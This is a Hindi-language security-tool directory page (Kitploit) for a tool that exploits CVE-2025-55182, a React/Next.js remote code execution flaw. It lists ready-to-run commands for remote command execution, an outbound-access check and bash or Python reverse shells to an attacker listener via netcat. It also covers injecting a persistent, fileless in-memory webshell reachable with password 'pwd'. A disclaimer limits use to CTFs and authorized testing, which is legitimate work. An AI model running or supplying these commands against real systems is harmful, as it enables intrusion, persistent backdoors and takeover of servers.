Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Toolbox — CVE-2025-55182 (React/Next.js RCE) के लिए स्वचालित शोषण उपकरण, जिसमें कमांड निष्पादन, आउटबाउंड डिटेक्शन, इंटरैक्टिव रिवर्स शेल, और अधिकृत पेनिट्रेशन टेस्टिंग और CTF चुनौतियों के लिए स्थायी मेमोरी वेबशेल इंजेक्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/lamaper/cve-2025-55182-toolbox
स्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

CVE-2025-55182 (React/Next.js RCE) के लिए स्वचालित शोषण उपकरण, जिसमें कमांड निष्पादन, आउटबाउंड डिटेक्शन, इंटरैक्टिव रिवर्स शेल, और अधिकृत पेनिट्रेशन टेस्टिंग और CTF चुनौतियों के लिए स्थायी मेमोरी वेबशेल इंजेक्शन शामिल है।

रिपॉजिटरी देखें
148 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

React2Shell: CVE-2025-55182 व्यापक शोषण उपकरण

लेखक: lamaper / BITs2Sys

संस्करण: 1.0.1

लाइसेंस: MIT

📝 उपकरण परिचय

यह उपकरण विशेष रूप से CVE-2025-55182 (React Server Components / Next.js प्रोटोटाइप श्रृंखला प्रदूषण के कारण RCE) के लिए एक स्वचालित प्रवेश परीक्षण उपकरण है। यह उपकरण CTF प्रतियोगिताओं और अधिकृत सुरक्षा सेवा परियोजनाओं के लिए डिज़ाइन किया गया है, जिसमें कमजोरी सत्यापन, आउटबाउंड डिटेक्शन, रिवर्स शेल और मेमोरी शेल इंजेक्शन जैसी कई सुविधाएँ एकीकृत हैं।

🚀 मुख्य विशेषताएँ

  • एक-क्लिक कमांड निष्पादन (--cmd) : NEXT_REDIRECT अपवाद तंत्र का उपयोग करके, Base64-एन्कोडेड कमांड निष्पादन परिणामों को सटीक रूप से वापस लाता है।
  • आउटबाउंड स्थिति जांच (--check-outbound) : लक्ष्य मशीन की DNS, HTTP और ICMP तक पहुंच का स्वचालित परीक्षण करता है, हमले के पथ निर्धारण में सहायता करता है।
  • इंटरैक्टिव रिवर्स शेल (--shell) : Bash और Python3 दो रिवर्स मोड में अंतर्निहित, एसिंक्रोनस निष्पादन का समर्थन करता है, HTTP अनुरोधों को लटकने से रोकता है।
  • स्थायी मेमोरी शेल (--inject-ms) : Node.js http.Server ईवेंट वितरण तंत्र को अपहृत करके मेमोरी शेल इंजेक्ट करता है, कोई फ़ाइल अवशेष नहीं, स्थायी नियंत्रण का समर्थन करता है।
  • मेमोरी शेल इंटरैक्शन इंटरफ़ेस (--ms-cmd) : कमजोरी ट्रिगर पथ से स्वतंत्र इंटरैक्शन मोड, इंजेक्शन सफल होने के बाद सीधे बैकडोर के माध्यम से कमांड निष्पादित करता है।
  • 🛠️ स्थापना और निर्भरताएँ

    यह उपकरण Python 3 पर विकसित है, केवल requests लाइब्रेरी स्थापित करने की आवश्यकता है।

    root@kitploit:~
    pip install requests
    

    📖 उपयोग गाइड

    0. कमजोरी की जाँच करें

    https://github.com/assetnote/react2shell-scanner एक बहुत उपयोगी जांच उपकरण है

    1. मूल कमांड निष्पादन

    सीधे लक्ष्य मशीन की जानकारी प्राप्त करें:

    root@kitploit:~
    python exploit.py --url http://target.com/ --cmd "id"
    python exploit.py --url http://target.com/ --cmd "cat /flag"
    

    2. आउटबाउंड जांच

    रिवर्स शेल का प्रयास करने से पहले, पुष्टि करें कि लक्ष्य मशीन इंटरनेट से कनेक्ट हो सकती है:

    root@kitploit:~
    python exploit.py --url http://target.com/ --check-outbound
    

    3. रिवर्स शेल

    Bash मोड:

    root@kitploit:~
    # आक्रमण मशीन पर सुनें: nc -lvnp 4444
    python exploit.py --url http://target.com/ --shell bash --ip <आपका IP> --port 4444
    

    Python मोड:

    root@kitploit:~
    python exploit.py --url http://target.com/ --shell python --ip <आपका IP> --port 4444
    

    4. मेमोरी शेल का उपयोग (स्थायी)

    मेमोरी शेल इंजेक्ट करें:

    root@kitploit:~
    python exploit.py --url http://target.com/ --inject-ms
    

    मेमोरी शेल के माध्यम से कमांड निष्पादित करें (इंजेक्शन सफल होने के बाद उपयोग करें):

    root@kitploit:~
    python exploit.py --url http://target.com/ --ms-cmd "whoami"
    

    नोट: मेमोरी शेल का डिफ़ॉल्ट माउंट पथ /?pass है, POST के माध्यम से pwd पैरामीटर सबमिट करके ट्रिगर किया जाता है।

    चीनी AntSword के माध्यम से कनेक्ट करें:

    कनेक्शन पासवर्ड: pwd, कनेक्शन विधि: CMDLINUX

    ⚠️ अस्वीकरण

    यह उपकरण केवल कानूनी रूप से अनुमत सुरक्षा अनुसंधान, CTF प्रतियोगिताओं और अधिकृत प्रवेश परीक्षण के लिए है। इसे अवैध हमलों के लिए उपयोग करना सख्त मना है। इस उपकरण का उपयोग करने से उत्पन्न सभी परिणाम उपयोगकर्ता की जिम्मेदारी हैं।


    टूल डाउनलोड करें